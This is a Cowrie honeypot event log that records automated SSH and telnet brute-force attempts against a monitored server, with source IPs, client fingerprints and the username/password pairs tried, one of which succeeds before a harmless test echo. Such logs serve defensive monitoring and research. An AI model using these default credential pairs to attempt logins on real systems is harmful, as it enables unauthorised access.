{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:54.537903Z","src_ip":"212.227.125.160","session":"698685e19f98"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.235","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"f668b7cde3b1","protocol":"ssh","message":"New connection: 185.156.73.235:64001 (1.2.3.4:22) [session: f668b7cde3b1]","sensor":"my-vps","timestamp":"2025-08-28T05:50:55.340447Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:55.362104Z","src_ip":"185.156.73.235","session":"f668b7cde3b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33202,"dst_ip":"1.2.3.4","dst_port":22,"session":"2041c1999c98","protocol":"ssh","message":"New connection: 212.227.235.229:33202 (1.2.3.4:22) [session: 2041c1999c98]","sensor":"my-vps","timestamp":"2025-08-28T05:50:57.217007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:57.217689Z","src_ip":"212.227.235.229","session":"2041c1999c98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:50:57.361853Z","src_ip":"212.227.235.229","session":"2041c1999c98"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-28T05:50:57.795661Z","src_ip":"212.227.235.229","session":"2041c1999c98"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:58.941716Z","src_ip":"212.227.235.229","session":"2041c1999c98"}
{"eventid":"cowrie.session.closed","duration":32.52423024177551,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:11.187771Z","src_ip":"8.222.212.69","session":"e84b3509c9cb"}
{"eventid":"cowrie.session.connect","src_ip":"159.223.199.28","src_port":52370,"dst_ip":"1.2.3.4","dst_port":23,"session":"8671e7bb78f3","protocol":"telnet","message":"New connection: 159.223.199.28:52370 (1.2.3.4:23) [session: 8671e7bb78f3]","sensor":"my-vps","timestamp":"2025-08-28T05:51:18.936838Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:19.338120Z","src_ip":"159.223.199.28","session":"8671e7bb78f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53256,"dst_ip":"1.2.3.4","dst_port":22,"session":"78a1198a9550","protocol":"ssh","message":"New connection: 212.227.125.160:53256 (1.2.3.4:22) [session: 78a1198a9550]","sensor":"my-vps","timestamp":"2025-08-28T05:51:19.594075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:51:19.619831Z","src_ip":"212.227.125.160","session":"78a1198a9550"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:51:19.715786Z","src_ip":"212.227.125.160","session":"78a1198a9550"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:20.119005Z","src_ip":"212.227.125.160","session":"78a1198a9550"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:20.760117Z","src_ip":"159.223.199.28","session":"8671e7bb78f3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:21.231784Z","src_ip":"212.227.125.160","session":"78a1198a9550"}
{"eventid":"cowrie.session.closed","duration":2.507026433944702,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:21.443792Z","src_ip":"159.223.199.28","session":"8671e7bb78f3"}
{"eventid":"cowrie.session.connect","src_ip":"159.223.199.28","src_port":52376,"dst_ip":"1.2.3.4","dst_port":23,"session":"986caa5f342b","protocol":"telnet","message":"New connection: 159.223.199.28:52376 (1.2.3.4:23) [session: 986caa5f342b]","sensor":"my-vps","timestamp":"2025-08-28T05:51:21.614980Z"}
{"eventid":"cowrie.session.closed","duration":1.352391004562378,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:22.967304Z","src_ip":"159.223.199.28","session":"986caa5f342b"}
{"eventid":"cowrie.session.connect","src_ip":"159.223.199.28","src_port":50560,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7a4e3e8650c","protocol":"telnet","message":"New connection: 159.223.199.28:50560 (1.2.3.4:23) [session: c7a4e3e8650c]","sensor":"my-vps","timestamp":"2025-08-28T05:51:24.427729Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:51:24.829144Z","src_ip":"159.223.199.28","session":"c7a4e3e8650c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:51:24.917518Z","src_ip":"159.223.199.28","session":"c7a4e3e8650c"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T05:51:25.113747Z","src_ip":"159.223.199.28","session":"c7a4e3e8650c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42439,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f4bbe6ed9b2","protocol":"telnet","message":"New connection: 212.227.235.229:42439 (1.2.3.4:23) [session: 0f4bbe6ed9b2]","sensor":"my-vps","timestamp":"2025-08-28T05:51:26.147699Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:26.247046Z","src_ip":"159.223.199.28","session":"c7a4e3e8650c"}
{"eventid":"cowrie.session.closed","duration":1.8245646953582764,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:26.252221Z","src_ip":"159.223.199.28","session":"c7a4e3e8650c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55350,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffa7cd68f36a","protocol":"ssh","message":"New connection: 212.227.235.229:55350 (1.2.3.4:22) [session: ffa7cd68f36a]","sensor":"my-vps","timestamp":"2025-08-28T05:51:27.216202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:51:27.216877Z","src_ip":"212.227.235.229","session":"ffa7cd68f36a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:51:27.360161Z","src_ip":"212.227.235.229","session":"ffa7cd68f36a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42774,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c1638ca567a","protocol":"ssh","message":"New connection: 212.227.235.229:42774 (1.2.3.4:22) [session: 1c1638ca567a]","sensor":"my-vps","timestamp":"2025-08-28T05:51:27.530139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:51:27.531115Z","src_ip":"212.227.235.229","session":"1c1638ca567a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:51:27.676545Z","src_ip":"212.227.235.229","session":"1c1638ca567a"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:27.791161Z","src_ip":"212.227.235.229","session":"ffa7cd68f36a"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:28.124944Z","src_ip":"212.227.235.229","session":"1c1638ca567a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:28.936065Z","src_ip":"212.227.235.229","session":"ffa7cd68f36a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:29.271502Z","src_ip":"212.227.235.229","session":"1c1638ca567a"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:30.705127Z","src_ip":"212.227.235.229","session":"3f1f7014965b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48932,"dst_ip":"1.2.3.4","dst_port":22,"session":"e929710925cb","protocol":"ssh","message":"New connection: 212.227.125.160:48932 (1.2.3.4:22) [session: e929710925cb]","sensor":"my-vps","timestamp":"2025-08-28T05:51:34.992899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:51:35.002383Z","src_ip":"212.227.125.160","session":"e929710925cb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:51:35.113954Z","src_ip":"212.227.125.160","session":"e929710925cb"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:35.515997Z","src_ip":"212.227.125.160","session":"e929710925cb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:36.622363Z","src_ip":"212.227.125.160","session":"e929710925cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50930,"dst_ip":"1.2.3.4","dst_port":22,"session":"447739d41728","protocol":"ssh","message":"New connection: 212.227.235.229:50930 (1.2.3.4:22) [session: 447739d41728]","sensor":"my-vps","timestamp":"2025-08-28T05:51:45.171191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:51:45.172330Z","src_ip":"212.227.235.229","session":"447739d41728"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:51:45.317756Z","src_ip":"212.227.235.229","session":"447739d41728"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:45.755330Z","src_ip":"212.227.235.229","session":"447739d41728"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:46.903698Z","src_ip":"212.227.235.229","session":"447739d41728"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54514,"dst_ip":"1.2.3.4","dst_port":22,"session":"f29bdebb7e6b","protocol":"ssh","message":"New connection: 212.227.125.160:54514 (1.2.3.4:22) [session: f29bdebb7e6b]","sensor":"my-vps","timestamp":"2025-08-28T05:51:49.851030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:51:49.852275Z","src_ip":"212.227.125.160","session":"f29bdebb7e6b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:51:49.962398Z","src_ip":"212.227.125.160","session":"f29bdebb7e6b"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:50.387791Z","src_ip":"212.227.125.160","session":"f29bdebb7e6b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:51.496915Z","src_ip":"212.227.125.160","session":"f29bdebb7e6b"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":33358,"dst_ip":"1.2.3.4","dst_port":23,"session":"9b0c81575411","protocol":"telnet","message":"New connection: 8.222.212.69:33358 (1.2.3.4:23) [session: 9b0c81575411]","sensor":"my-vps","timestamp":"2025-08-28T05:51:55.940050Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46046,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2cd01bb7fc7","protocol":"ssh","message":"New connection: 212.227.235.229:46046 (1.2.3.4:22) [session: c2cd01bb7fc7]","sensor":"my-vps","timestamp":"2025-08-28T05:51:57.129222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:51:57.130168Z","src_ip":"212.227.235.229","session":"c2cd01bb7fc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:51:57.273306Z","src_ip":"212.227.235.229","session":"c2cd01bb7fc7"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:51:57.714541Z","src_ip":"212.227.235.229","session":"c2cd01bb7fc7"}
{"eventid":"cowrie.session.closed","duration":31.71488356590271,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:57.862506Z","src_ip":"212.227.235.229","session":"0f4bbe6ed9b2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:51:58.860390Z","src_ip":"212.227.235.229","session":"c2cd01bb7fc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39866,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1fead343ea9","protocol":"ssh","message":"New connection: 212.227.125.160:39866 (1.2.3.4:22) [session: e1fead343ea9]","sensor":"my-vps","timestamp":"2025-08-28T05:52:04.680204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:52:04.685571Z","src_ip":"212.227.125.160","session":"e1fead343ea9"}
